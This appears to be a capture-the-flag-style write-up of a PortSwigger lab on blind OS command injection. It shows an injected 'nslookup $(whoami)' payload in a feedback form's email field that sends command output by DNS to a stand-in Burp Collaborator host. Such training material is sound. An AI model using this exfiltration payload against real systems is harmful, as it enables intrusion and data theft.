> For the complete documentation index, see [llms.txt](https://kruknight.gitbook.io/daemon-of-hacking/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kruknight.gitbook.io/daemon-of-hacking/writeups/portswigger-labs/os-command-injection/blind-os-command-injection-with-out-of-band-data-exfiltration.md).

# Blind OS command injection with out-of-band data exfiltration

## Lab Description

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2Fr5KXzoS0ryNlPBOxsKhq%2Fimage.png?alt=media&amp;token=f2826550-7dc8-443f-9dec-1c219d5b7830" alt=""><figcaption></figcaption></figure>

## Walkthrough

### **Step 1: Understanding the Lab**

This lab focuses on blind OS command injection, where command outputs are exfiltrated via DNS queries to an external domain. The task is to execute the `whoami` command and exfiltrate the result using Burp Collaborator.

### **Step 2: Understanding the Feedback Functionality**

The Submit Feedback page contains four input fields:

* Name
* Email
* Subject
* Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2F3Dt4ObSEp0ibWo0aP9eu%2Fimage.png?alt=media&amp;token=78081f51-a6ba-4251-9cc9-79778adeb934" alt=""><figcaption></figcaption></figure>

### **Step 3: Intercepting the Request**

1. Submit the feedback form with dummy data (e.g., `test` in all fields).
2. Intercept the request in Burp Suite. The captured HTTP request contains:
   * The form inputs (e.g., `name=test`, `email=test@test.net`).
   * Other metadata such as CSRF tokens and cookies.

**Objective:** Modify one of these parameters to inject a payload that executes the `whoami` command and exfiltrates its output via a DNS query to Burp Collaborator. This will confirm both command injection and successful data exfiltration.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2Fx3swXcfDtxF1iTmUcueK%2Fimage.png?alt=media&amp;token=77c4fc43-9bcc-4300-ab9d-1c92953dbba2" alt=""><figcaption><p>\</p></figcaption></figure>

**Step 4: Crafting the Payload**

Modify one of the input fields (e.g., **email**) to inject the following payload:

```
||nslookup+$(whoami).BURP-COLLABORATOR-SUBDOMAIN||
```

**Payload Explanation:**

* `||`: Delimiters to separate commands.
* `nslookup`: Executes a DNS lookup.
* `$(whoami)`: Executes the `whoami` command and appends the output to the DNS query.
* `BURP-COLLABORATOR-SUBDOMAIN`: Your unique Collaborator server address.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2Fw5afBhSXNYOOM7dc76y6%2Fimage.png?alt=media&amp;token=6f96530c-e816-47f2-85d9-f6bf4060f085" alt=""><figcaption></figcaption></figure>

### **Step 4: Verifying the Exploit**

* Look for DNS queries logged by Burp Collaborator.
* The queried domain will contain the output of the `whoami` command, such as **`peter-Nrsm8s.BURP-COLLABORATOR-SUBDOMAIN.`**

This confirms that:

1. The server executed the injected command.
2. The command output (**`peter-Nrsm8s`**) was exfiltrated successfully.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2FiRyFrMyHla6sYQ1mB4R8%2Fimage.png?alt=media&amp;token=70afac05-cdf8-4f64-94d0-3842304c2491" alt=""><figcaption></figcaption></figure>
